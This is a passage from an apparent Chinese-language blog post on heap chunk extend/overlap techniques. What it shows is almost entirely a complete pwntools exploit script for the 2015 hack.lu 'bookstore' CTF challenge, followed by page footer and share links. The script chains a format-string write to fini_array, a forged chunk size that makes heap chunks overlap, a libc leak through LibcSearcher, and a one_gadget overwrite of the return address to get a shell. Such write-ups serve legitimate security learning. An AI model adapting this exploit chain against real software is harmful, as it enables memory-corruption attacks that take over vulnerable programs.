class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">pwnfile=<span class="string">&#x27;./books_e_o&#x27;</span></span><br><span class="line">elf = ELF(pwnfile)</span><br><span class="line">rop = ROP(pwnfile)</span><br><span class="line"><span class="keyword">if</span> args[<span class="string">&#x27;REMOTE&#x27;</span>]:</span><br><span class="line">    io = remote()</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io = process(pwnfile)</span><br><span class="line">r = <span class="keyword">lambda</span> x: io.recv(x)</span><br><span class="line">ra = <span class="keyword">lambda</span>: io.recvall()</span><br><span class="line">rl = <span class="keyword">lambda</span>: io.recvline(keepends=<span class="literal">True</span>)</span><br><span class="line">ru = <span class="keyword">lambda</span> x: io.recvuntil(x, drop=<span class="literal">True</span>)</span><br><span class="line">s = <span class="keyword">lambda</span> x: io.send(x)</span><br><span class="line">sl = <span class="keyword">lambda</span> x: io.sendline(x)</span><br><span class="line">sa = <span class="keyword">lambda</span> x, y: io.sendafter(x, y)</span><br><span class="line">sla = <span class="keyword">lambda</span> x, y: io.sendlineafter(x, y)</span><br><span class="line">ia = <span class="keyword">lambda</span>: io.interactive()</span><br><span class="line">c = <span class="keyword">lambda</span>: io.close()</span><br><span class="line">li = <span class="keyword">lambda</span> x: log.info(x)</span><br><span class="line">db = <span class="keyword">lambda</span> x : gdb.attach(io,x)</span><br><span class="line">p =<span class="keyword">lambda</span> x,y:success(x+<span class="string">&#x27;--&gt;&#x27;</span>+<span class="built_in">hex</span>(y))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">order, name</span>):</span><br><span class="line">    io.recvuntil(<span class="string">b&#x27;5: Submit\n&#x27;</span>)</span><br><span class="line">    io.sendline(<span class="built_in">str</span>(order).encode())</span><br><span class="line">    io.recvuntil(<span class="string">b&#x27; order:\n&#x27;</span>)</span><br><span class="line">    io.sendline(name)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">order</span>):</span><br><span class="line">    io.recvuntil(<span class="string">b&#x27;5: Submit\n&#x27;</span>)</span><br><span class="line">    io.sendline(<span class="built_in">str</span>(order + <span class="number">2</span>).encode())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">submit</span>(<span class="params">payload</span>):</span><br><span class="line">    io.recvuntil(<span class="string">b&#x27;5: Submit\n&#x27;</span>)</span><br><span class="line">    io.sendline(<span class="string">b&#x27;5&#x27;</span> + payload)</span><br><span class="line">    io.recvuntil(<span class="string">b&#x27;Order 1: &#x27;</span>)</span><br><span class="line">    io.recvuntil(<span class="string">b&#x27;Order 2: Order 1: &#x27;</span>)</span><br><span class="line">    </span><br><span class="line"><span class="comment"># db(&#x27;b *0x400A91&#x27;)</span></span><br><span class="line">free_got = elf.got[<span class="string">&#x27;free&#x27;</span>]</span><br><span class="line">fini_array = <span class="number">0x6011B8</span></span><br><span class="line">main_addr = <span class="number">0x400A39</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&quot;%&quot;</span>+<span class="built_in">str</span>(<span class="number">2617</span>).encode()+<span class="string">b&quot;c%13$hn&quot;</span>  + <span class="string">b&#x27;abc%51$p&#x27;</span> + <span class="string">b&#x27;def%26$p&#x27;</span></span><br><span class="line">payload += <span class="string">b&#x27;A&#x27;</span>*(<span class="number">0x74</span>-<span class="built_in">len</span>(payload))</span><br><span class="line">payload=payload.ljust(<span class="number">0x88</span>,<span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += p64(<span class="number">0x151</span>)</span><br><span class="line">edit(<span class="number">1</span>,payload)</span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">payload2 = p8(<span class="number">0x0</span>)*<span class="number">7</span> + p64(fini_array)</span><br><span class="line">submit(payload2)</span><br><span class="line">ru(<span class="string">b&#x27;abc&#x27;</span>)</span><br><span class="line">ru(<span class="string">b&#x27;abc&#x27;</span>)</span><br><span class="line">__libc_start_main=<span class="built_in">int</span>(r(<span class="number">14</span>),<span class="number">16</span>)-<span class="number">128</span></span><br><span class="line">ru(<span class="string">b&#x27;def&#x27;</span>)</span><br><span class="line">fixed=<span class="built_in">int</span>(r(<span class="number">14</span>),<span class="number">16</span>)</span><br><span class="line">p(<span class="string">&#x27;__libc_start_main&#x27;</span>,__libc_start_main)</span><br><span class="line">p(<span class="string">&#x27;fixed&#x27;</span>,fixed)</span><br><span class="line">libc=LibcSearcher(<span class="string">&#x27;__libc_start_main&#x27;</span>,__libc_start_main)</span><br><span class="line">base=__libc_start_main-libc.dump(<span class="string">&#x27;__libc_start_main&#x27;</span>)</span><br><span class="line">ret_bp=fixed-<span class="number">0x461</span>-<span class="number">0x100</span></span><br><span class="line">p(<span class="string">&#x27;ret_bp&#x27;</span>,ret_bp)</span><br><span class="line">one_gadget=<span class="number">0xebcf5</span>+base</span><br><span class="line">p(<span class="string">&#x27;one_gadget&#x27;</span>,one_gadget)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>((one_gadget&gt;&gt;<span class="number">8</span>)&amp;<span class="number">0xffff</span>)</span><br><span class="line">payload=<span class="string">b&#x27;%&#x27;</span>+<span class="built_in">str</span>(one_gadget&amp;<span class="number">0xff</span>).encode()+<span class="string">b&#x27;c%13$hhn%&#x27;</span>+<span class="built_in">str</span>(((one_gadget&gt;&gt;<span class="number">8</span>)&amp;<span class="number">0xffff</span>)-(one_gadget&amp;<span class="number">0xff</span>)).encode()+<span class="string">b&#x27;c%14$hn&#x27;</span></span><br><span class="line"><span class="built_in">print</span>(payload)</span><br><span class="line">payload += <span class="string">b&#x27;A&#x27;</span>*(<span class="number">0x74</span>-<span class="built_in">len</span>(payload))</span><br><span class="line">payload=payload.ljust(<span class="number">0x88</span>,<span class="string">b&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += p64(<span class="number">0x151</span>)</span><br><span class="line">edit(<span class="number">1</span>,payload)</span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">payload=p8(<span class="number">0x0</span>)*<span class="number">7</span>+p64(ret_bp)+p64(ret_bp+<span class="number">1</span>)</span><br><span class="line">submit(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>


  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#HITCON-Trainging-lab13"><span class="toc-number">1.</span> <span class="toc-text">HITCON Trainging lab13</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp"><span class="toc-number">2.</span> <span class="toc-text">exp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2015-hacklu-bookstore"><span class="toc-number">3.</span> <span class="toc-text">2015 hacklu bookstore</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%A7%E4%BD%93%E6%80%9D%E8%B7%AF"><span class="toc-number">3.1.</span> <span class="toc-text">大体思路</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B7%E4%BD%93%E7%BB%86%E8%8A%82"><span class="toc-number">3.2.</span> <span class="toc-text">具体细节</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EXP"><span class="toc-number">4.</span> <span class="toc-text">EXP</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&text=Chunk Extend and Overlapping"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&title=Chunk Extend and Overlapping"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&is_video=false&description=Chunk Extend and Overlapping"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Chunk Extend and Overlapping&body=Check out this article: https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&title=Chunk Extend and Overlapping"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&title=Chunk Extend and Overlapping"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&title=Chunk Extend and Overlapping"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&title=Chunk Extend and Overlapping"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&name=Chunk Extend and Overlapping&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://grxer.gitee.io/2023/03/10/Chunk-Extend-and-Overlapping/&t=Chunk Extend and Overlapping"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2023
    Grxer
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

  <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?a22ef0bec4e4a9c7337bea6e37ff55c1";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
        </script>

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
